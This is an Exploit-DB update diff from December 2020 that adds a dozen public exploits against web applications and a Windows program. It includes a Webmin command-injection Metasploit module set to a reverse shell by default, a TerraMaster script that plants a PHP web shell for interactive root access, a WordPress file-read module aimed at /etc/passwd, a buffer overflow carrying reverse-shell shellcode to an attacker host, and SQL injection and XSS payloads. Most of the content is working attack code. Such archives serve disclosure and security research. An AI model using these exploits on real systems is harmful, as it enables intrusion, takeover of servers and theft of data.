DB: 2020-12-23

12 changes to exploits/shellcodes

10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
Victor CMS 1.0 - File Upload To RCE
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
CSE Bookstore 1.0 - Multiple SQL Injection
Library Management System 3.0 - _Add Category_ Stored XSS
Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)
Artworks Gallery Management System 1.0 - 'id' SQL Injection
Faculty Evaluation System 1.0 - Stored XSS
TerraMaster TOS 4.2.06 - RCE (Unauthenticated)

exploits/linux/webapps/49318.rb

@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.962 and lower versions. Any user authorized to the "Package Updates"
+        module can execute arbitrary commands with root privileges. 
+        It emerged by circumventing the measure taken for CVE-2019-12840.
+        s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
+        Therefore, since the package name variable is placed directly in the system command, 
+        we can manipulate it using some escape characters that HTTP supports. 
+        For example, we can escape control by dropping the command line down one line. 
+        We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly, 
+        we must add double an ampersand(&&) to the end of the payload (%26%26)
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', 'CVE-2020-35606'],
+          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_perl'
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.962', {}]],
+      'DisclosureDate' => '2020-12-21',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+      'cookie' => 'testing=1', # it must be used for "Error - No cookies"
+      'vars_post' => {
+        'page' => '',
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD']
+      }
+    })
+
+    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+      return $1
+    end
+
+    return nil unless res
+    ''
+  end
+
+  def check
+    cookie = login
+    return CheckCode::Detected if cookie == ''
+    return CheckCode::Unknown if cookie.nil?
+
+    vprint_status('Attempting to execute...')
+    # check version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "sysinfo.cgi"),
+      'cookie'  => "sid=#{cookie}",
+      'vars_get' => { "xnavigation" => "1" }
+    })
+
+    if res && res.code == 302 && res.body
+      version = res.body.split("Webmin 1.")[1]
+      return CheckCode::Detected if version.nil?
+      version = version.split(" ")[0]
+      if version <= "962"
+        # check package update priv
+        res = send_request_cgi({
+          'uri'     => normalize_uri(target_uri.path, "package-updates/"),
+          'cookie'  => "sid=#{cookie}"
+        })
+
+        if res && res.code == 200 && res.body =~ /Software Package Update/
+          print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+          return CheckCode::Vulnerable
+        end
+      end
+    end
+    print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
+    print_status("Please try with another user account!")
+    CheckCode::Safe
+  end
+
+  def exploit
+    cookie = login
+    if cookie == '' || cookie.nil?
+      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+    end
+    print_good("Session cookie: #{cookie}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+      'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+      'cookie' => "sid=#{cookie}"
+    )
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Request failed')
+    end
+
+    print_status("Attempting to execute the payload...")
+    run_update(cookie)
+  end
+
+  def run_update(cookie)
+    @b64p = Rex::Text.encode_base64(payload.encoded)
+    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+    payload = Rex::Text.uri_encode(perl_payload)
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'cookie' => "sid=#{cookie}",
+        'ctype'  => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+        'headers' =>
+          {
+            'Referer' => "#{peer}/package-updates/?xnavigation=1"
+          },
+        # new vector // bypass to backslash  %0A%7C{}%26%26
+        'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
+        # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
+      })
+  end
+end

exploits/linux/webapps/49321.py

@@ -0,0 +1,66 @@
+# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
+# Date: 12/12/2020
+# Exploit Author: IHTeam
+# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: <= 4.2.06
+# Tested on: 4.1.30, 4.2.06
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import time
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
+parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
+args = parser.parse_args()
+
+url = args.url
+headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+epoch_time = int(time.time())
+shell_filename = "debug"+str(epoch_time)+".php"
+
+def check_endpoint(url, headers):
+	response = requests.get(url+'/version', headers=headers, verify=False)
+	if response.status_code == 200:
+		print("[+] TerraMaster TOS version: ", str(response.content))
+	else:
+		print("\n[-] TerraMaster TOS response code: ", response.status_code)
+		sys.exit()
+		
+def upload_shell(url, headers, shell_filename):
+	payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
+	payload = urllib.parse.quote(payload, safe='')
+	print("[/] Uploading shell...")
+	response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
+	time.sleep(1)
+	response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
+	if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
+		print("[+] Upload succeeded")
+	else:
+		print("\n[-] Error uploading shell: ", response.content)
+		sys.exit()
+
+def interactive_shell(url, headers, shell_filename, cmd):
+	response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
+	print(str(response.text)+"\n")
+
+
+def delete_shell(url, headers, shell_filename):
+	delcmd = "rm /usr/www/"+shell_filename
+	response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
+	print("\n[+] Shell deleted")
+
+check_endpoint(url, headers)
+upload_shell(url, headers, shell_filename)
+try:
+	while True:
+		cmd = input("# ")
+		interactive_shell(url, headers, shell_filename, cmd)
+except:
+	delete_shell(url, headers, shell_filename)

exploits/php/webapps/49307.txt

@@ -4,6 +4,7 @@
 # Vendor: Phpgurukul
 # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
 # Version: 1.0
+# CVE: CVE-2020-35151
 
 I DESCRIPTION
 ========================================================================

exploits/php/webapps/49310.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Victor CMS 1.0 - File Upload To RCE
+# Date: 20.12.2020
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+
+# Tested on: Apache2/Linux
+
+Step1: register http://localhost/CMSsite-master/register.php
+step2: login as user
+step3: Go to Profile 
+step4: upload imag as php file (upload shell.php)
+step5: update user 
+step6: You will find your shell in img folder :/path/img/cmd.php
+
+http://localhost/CMSsite-master/img/cmd.php?cmd=id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)

exploits/php/webapps/49312.txt

@@ -0,0 +1,82 @@
+# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
+# Date: 12-21-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 750
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
+# Vulnerable Parameter : network_csv
+
+
+# POC
+
+POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
+Content-Length: 1597
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_manual_defined"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_select"
+
+300
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_text"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_units"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="taskname"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="id_recon_server"
+
+3
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv_enabled"
+
+on
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv"; filename="test.txt"
+Content-Type: text/plain
+
+' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network"
+
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="comment"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="submit"
+
+Next
+-----------------------------308827614039434535382911921119--

exploits/php/webapps/49314.txt

@@ -0,0 +1,110 @@
+# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
+# Date      : 2020-12-21
+# Author    : Musyoka Ian
+# Version   : CSE Bookstore 1.0
+# Vendor Homepage: https://projectworlds.in/
+# Platform  : PHP
+# Tested on : Debian
+
+CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability  will lead to an attacker dumping the entire database the web appliction is running on
+
+Below is results returned by  SQLMap 
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#                                                                                                                                                                    Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
+
+
+POC 1 
+
+REQUEST
+========
+GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+Host: 192.168.196.83
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+Upgrade-Insecure-Requests: 1
+
+RESPONSE
+========
+
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:09:49 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 172
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
+
+POC 2
+Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
+
+REQUEST
+=======
+
+POST /ebook/cart.php HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+
+bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+RESPONSE
+=======
+get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
+
+POC 3.
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
+
+REQUEST
+=======
+GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/books.php
+Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:47:58 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 188
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1

exploits/php/webapps/49315.txt

@@ -0,0 +1,20 @@
+# Exploit Title:  Library Management System 3.0 - "Add Category" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-22
+# Google Dork: N/A
+# Vendor Homepage: https://otsglobal.org/
+# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
+# Affected Version: 3.0
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Admin.
+
+Step 2. Select "Book" from menu and select "Categories" from sub menu and
+after that click on "Add Category".
+
+Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
+
+Step 4. Now  Click on "Save" , Go to "Category" and See last , there you
+will get alert box.

exploits/php/webapps/49316.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-21
+# Google Dork: N/A
+# Vendor Homepage: https://www.ramomcoder.com/
+# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
+# Affected Version: 3.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Super Admin.
+
+Step 2. Select "Branch" from menu and after that click on "Create Branch".
+
+Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" ,
+"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
+
+Step 4. Now  Click on "Save" and  you will get a list of alert boxes.

exploits/php/webapps/49317.rb

@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Exploit::Remote::HTTP::Wordpress
+include Msf::Auxiliary::Scanner
+
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
+'Description' => %q{
+This module exploits an unauthenticated directory traversal vulnerability
+in WordPress plugin
+'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
+the web server privileges.
+},
+'References' =>
+[
+['CVE', '2019-6715'],
+['WPVDB', '9248'],
+['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
+['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
+],
+'Author' =>
+[
+'VinhJAXT', # Vulnerability discovery
+'Hoa Nguyen - SunCSR Team' # Metasploit module
+],
+'DisclosureDate' => '2014-09-20',
+'License' => MSF_LICENSE
+)
+)
+
+register_options(
+[
+OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
+]
+)
+end
+
+def check
+check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
+end
+
+def run_host(ip)
+traversal = '../' * datastore['DEPTH']
+filename = datastore['FILEPATH']
+filename = filename[1, filename.length] if filename =~ %r{^/}
+
+json_body = { 'Type' => "SubscriptionConfirmation",
+'Message' => '',
+'SubscribeURL' => "file:///#{traversal}#{filename}"
+}
+
+res = send_request_cgi({
+'method' => 'PUT',
+'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
+'ctype' => 'application/json',
+'data' => JSON.generate(json_body)
+})
+
+fail_with Failure::Unreachable, 'Connection failed' unless res
+fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
+fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+
+print_status('Downloading file...')
+print_line("\n#{res.body}\n")
+
+fname = datastore['FILEPATH']
+path = store_loot(
+'w3_total_cache.traversal',
+'text/plain',
+ip,
+res.body,
+fname
+)
+print_good("File saved in: #{path}")
+end
+end

exploits/php/webapps/49319.txt

@@ -0,0 +1,64 @@
+# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Vijay Sachdeva
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+# Tested on Kali Linux
+
+Step 1. Log in to the application with admin credentials.
+
+Step 2. Click on "Explore" and then select "Artworks".
+
+Step 3. Choose any item, the URL should be "
+
+http://localhost/art-bay/info_art.php?id=6
+
+Step 4. Run sqlmap on the URL where the "id" parameter is given
+
+
+sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
+
+---
+
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+
+    Title: AND boolean-based blind - WHERE or HAVING clause
+
+    Payload: id=8 AND 4531=4531
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
+
+
+    Type: UNION query
+
+    Title: Generic UNION query (NULL) - 9 columns
+
+    Payload: id=8 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
+-
+
+---
+
+[08:18:34] [INFO] the back-end DBMS is MySQL
+
+[08:18:34] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+
+---
+
+
+Step 5. Sqlmap should inject the web-app successfully which leads to
+information disclosure.

exploits/php/webapps/49320.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
+# Exploit Author: Vijay Sachdeva (pwnshell)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
+# Tested on Kali Linux
+
+Step 1: Log in to the application with admin credentials
+
+Step 2: Click on Questionnaires, then click "Action" for any Academic Year
+and then click manage.
+
+Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of
+the Question form.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS
+payloads. Whenever you click on Questionnaires, click action for any
+academic year, and then manage,  your XSS Payloads will be triggered for
+that "Academic Year"

exploits/windows/local/49322.py

@@ -0,0 +1,78 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
+# Date: 2020-12-22
+# Exploit Author: Florian Gassner
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Version: 9.05
+# Tested on: Windows 10 x64
+
+# Computer -> From Text File -> Choose exploit.txt
+
+import struct
+
+"""
+Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
+"""
+
+OFFSET = 214
+
+"""
+badchars = '\x00\x09\x0a\x0d\x3a\x5c'
+"""
+
+"""
+Log data, item 23
+ Address=01015AF4
+ Message=  0x01015af4 : pop ecx # pop ebp # ret 0x04 |  {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
+"""
+
+pop_pop_ret = struct.pack("<I", 0x01015af4)
+
+short_jump = '\xEB\x06\x90\x90'
+
+"""
+msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
+"""
+shellcode =  ""
+shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
+shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
+shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
+shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
+shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
+shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
+shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
+shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
+shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
+shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
+shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
+shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
+shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
+shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
+shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
+shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
+shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
+shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
+shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
+shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
+shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
+shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
+shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
+shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
+shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
+shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
+shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
+shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
+shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
+shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
+shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
+shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
+
+payload =  'A' * (OFFSET - len(short_jump))
+payload += short_jump
+payload += pop_pop_ret
+payload += '\x90' * 8
+payload += shellcode
+
+f = open("exploit.txt", "w")
+f.write(payload)
+f.close()

files_exploits.csv

@@ -11232,6 +11232,7 @@ id,file,description,date,author,type,platform,port
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
+49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43524,3 +43525,13 @@ id,file,description,date,author,type,platform,port
 49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
